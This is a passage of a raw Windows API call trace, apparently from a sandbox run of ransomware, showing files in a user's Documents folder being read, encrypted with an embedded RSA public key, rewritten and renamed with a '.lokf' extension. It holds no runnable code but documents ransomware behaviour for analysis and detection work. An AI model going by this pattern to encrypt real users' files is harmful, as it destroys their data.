lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.586] CloseHandle (hObject=0x5cc) returned 1 [0059.586] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\ERvgLja.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\ervglja.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\ERvgLja.ots.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\ervglja.ots.lokf")) returned 1 [0059.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.587] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201650 | out: hHeap=0x660000) returned 1 [0059.588] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f72bfd0, ftCreationTime.dwHighDateTime=0x1d4cdfe, ftLastAccessTime.dwLowDateTime=0x8cb61f70, ftLastAccessTime.dwHighDateTime=0x1d4cff5, ftLastWriteTime.dwLowDateTime=0x8cb61f70, ftLastWriteTime.dwHighDateTime=0x1d4cff5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mw2tK3t ch7R6yApjv", cAlternateFileName="MW2TK3~1")) returned 1 [0059.588] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63e41430, ftCreationTime.dwHighDateTime=0x1d4caff, ftLastAccessTime.dwLowDateTime=0xa3eb90b0, ftLastAccessTime.dwHighDateTime=0x1d4cd7c, ftLastWriteTime.dwLowDateTime=0xa3eb90b0, ftLastWriteTime.dwHighDateTime=0x1d4cd7c, nFileSizeHigh=0x0, nFileSizeLow=0x16b54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nqPYpTIV1l.doc", cAlternateFileName="NQPYPT~1.DOC")) returned 1 [0059.588] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\nqPYpTIV1l.doc") returned=".doc" [0059.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\nqPYpTIV1l.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\nqpyptiv1l.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.588] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=93012) returned 1 [0059.588] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.590] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16b2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.590] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.591] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x16b54, lpOverlapped=0x0) returned 1 [0059.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.592] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.592] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.593] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.593] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.593] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.593] GetLastError () returned 0x0 [0059.593] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.593] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.593] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.593] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.593] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16b50) returned 0x9c88ae8 [0059.593] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87f38 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87f80 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6d0 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.594] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6d0 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85728 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.595] GetCurrentThreadId () returned 0x9e0 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c83f08 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.595] GetCurrentThreadId () returned 0x9e0 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.595] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.595] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6d0 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85728 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85758 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85788 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857a0 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.596] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6d0 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6e8 | out: hHeap=0x660000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6d0 | out: hHeap=0x660000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857a0 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87f80 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.598] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x16b4f, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x16b4f, lpOverlapped=0x0) returned 1 [0059.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.599] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16b54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.599] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.599] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.599] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 